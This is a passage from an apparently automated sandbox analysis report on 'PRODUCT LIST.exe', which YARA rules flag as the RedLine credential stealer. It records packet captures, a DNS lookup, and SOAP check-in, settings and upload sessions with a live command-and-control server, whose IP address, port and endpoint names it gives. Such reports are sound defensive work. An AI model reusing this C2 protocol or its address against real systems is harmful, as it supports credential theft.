                                                                                      Nov 24, 2024 11:49:16.133960962 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.133972883 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.133984089 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.133995056 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.134006023 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.134016991 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.134028912 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.134035110 CET4970616383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:16.134035110 CET4970616383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:16.253643990 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.299760103 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.299781084 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.299793005 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.299804926 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.299817085 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.299846888 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:17.482080936 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:17.483273983 CET4970716383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:17.537122011 CET4970616383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:17.602912903 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:17.603044987 CET4970716383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:17.603183031 CET4970716383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:17.722768068 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:17.959225893 CET4970716383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:18.080063105 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.080178022 CET4970716383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:18.080210924 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.080224991 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.080238104 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.080286980 CET4970716383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:18.080286980 CET4970716383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:18.080329895 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.080342054 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.080651999 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.080732107 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.081258059 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.081542969 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.199924946 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.200068951 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.200081110 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.200135946 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.200191975 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.247931004 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.999927998 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:19.018763065 CET4970616383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:19.018903017 CET4970716383192.168.2.5104.219.234.170

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 24, 2024 11:49:12.252300024 CET5949353192.168.2.51.1.1.1

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Nov 24, 2024 11:49:12.252300024 CET192.168.2.51.1.1.10xb122Standard query (0)api.ip.sbA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Nov 24, 2024 11:49:12.390635967 CET1.1.1.1192.168.2.50xb122No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • 104.219.234.170:16383

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.549704104.219.234.170163835032C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 11:49:04.539392948 CET242OUTPOST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                      Host: 104.219.234.170:16383
                                                                                      Content-Length: 137
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Connection: Keep-Alive
                                                                                      Nov 24, 2024 11:49:05.966825008 CET359INHTTP/1.1 200 OK
                                                                                      Content-Length: 212
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Sun, 24 Nov 2024 10:49:05 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                      Nov 24, 2024 11:49:11.026755095 CET225OUTPOST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                      Host: 104.219.234.170:16383
                                                                                      Content-Length: 144
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Nov 24, 2024 11:49:11.719696999 CET1236INHTTP/1.1 200 OK
                                                                                      Content-Length: 54852
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Sun, 24 Nov 2024 10:49:11 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>91.232.174.157</b:string><b:string>128.90.170.13</b:string><b:string>1.192.194.168</b:string><b:string>1.192.194.168</b:string><b:string>144.48.39.108</b:string><b:string>149.22.81.166</b:string><b:string>37.120.207.190</b:string><b:string>154.16.169.89</b:string><b:string>178.208.168.4</b:string><b:string>128.90.60.18</b:string><b:string>37.19.212.105</b:string><b:string>128.90.170.18</b:string><b:string>37.19.212.105</b:string><b:string>37.19.212.105</b:string><b:string>128.90.170.18</b:string><b:string>37.19.212.105</b:string><b:string>138.199.21.219</b:string><b:string>139.186.206.86</b:s [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.549706104.219.234.170163835032C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 11:49:16.007179976 CET222OUTPOST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                      Host: 104.219.234.170:16383
                                                                                      Content-Length: 20789
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Nov 24, 2024 11:49:17.482080936 CET294INHTTP/1.1 200 OK
                                                                                      Content-Length: 147
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Sun, 24 Nov 2024 10:49:17 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.549707104.219.234.170163835032C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 11:49:17.603183031 CET242OUTPOST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                      Host: 104.219.234.170:16383
                                                                                      Content-Length: 20781
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Connection: Keep-Alive
                                                                                      Nov 24, 2024 11:49:18.999927998 CET408INHTTP/1.1 200 OK
                                                                                      Content-Length: 261
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Sun, 24 Nov 2024 10:49:18 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:05:49:01
                                                                                      Start date:24/11/2024
                                                                                      Path:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\PRODUCT LIST.exe"
                                                                                      Imagebase:0x1f0000
                                                                                      File size:1'776'640 bytes
                                                                                      MD5 hash:A9B805862CCEE6848CE91EF51A31F71D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:1
                                                                                      Start time:05:49:02
                                                                                      Start date:24/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >